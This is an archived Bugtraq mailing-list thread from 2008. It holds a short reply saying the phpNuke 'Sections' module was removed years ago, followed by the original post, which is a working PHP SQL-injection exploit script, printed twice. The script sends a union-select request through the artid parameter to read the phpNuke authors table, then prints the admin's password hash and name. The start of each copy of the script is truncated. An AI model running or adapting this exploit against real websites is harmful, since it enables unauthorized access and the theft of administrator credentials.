Re: php-nuke 8.0 module sections artid blind sql inj vuln.

2008-12-31 Thread John Haywood 
The 'Sections' module was removed from phpNuke years ago, probably
around version 7.4 (2006) and was replaced by the 'Content' module.

John Haywood


-Original Message-
From: the.dume...@gmail.com
To: bugtraq@securityfocus.com
Subject: php-nuke 8.0 module sections artid blind sql inj vuln.
Date: 30 Dec 2008 14:31:59 -

 version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . "   [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Acıklama */
if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query 
="modules.php?name=Sections&op=printpage&artid=9+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query 
="modules.php?name=Sections&op=printpage&artid=9'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\\)(.*)(?=\"\<\/i\>)/", $result, $match)) print 
"\nAdmin's name: " .$match[0];}
else {echo "Basarısız(Exploit Failed)...";}

credits();


function credits(){
print "\n\n++\n\r Coded By dumenci \n\r 
Copyright (c) BugBUSTERs";
print "\n\r++\n";
exit;
}

?>

php-nuke 8.0 module sections artid blind sql inj vuln.

2008-12-30 Thread the . dumenci 
 version <8.0

<+> Tested on 7.9 & 6.0

';



if ($argc < 2){

print "Usage: " . $argv[0] . "   [table prefix]\n";

print "ex.: " . $argv[0] . " phpnuke.org 7\n";

credits();

exit;

}





/* Acıklama */

if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.

else {$prefix = $argv[3];}



switch ($argv[2]){

case "6":

$query 
="modules.php?name=Sections&op=printpage&artid=9+union+select+aid,pwd+from+".$prefix."_authors";

$version = 6;

break;

default:

$query 
="modules.php?name=Sections&op=printpage&artid=9'+union+select+aid,pwd+from+".$prefix."_authors";

$version = 7;

break;

}



$host = 'http://' . $argv[1] . '/'; # argv[1] - host

$http = $host . $query;

echo

'[+] host: '.$host . '

[+] nuke version: '.$version.'

';

#DEBUG

//print $http . "\n";



$result = file_get_contents($http);



preg_match("/([a-f0-9]{32})/", $result, $matches);

if ($matches[0]) {print "Hashs.: ".$matches[0];

if (preg_match("/(?<=\\)(.*)(?=\"\<\/i\>)/", $result, $match)) print 
"\nAdmin's name: " .$match[0];}

else {echo "Basarısız(Exploit Failed)...";}



credits();





function credits(){

print "\n\n++\n\r Coded By dumenci \n\r 
Copyright (c) BugBUSTERs";

print "\n\r++\n";

exit;

}



?>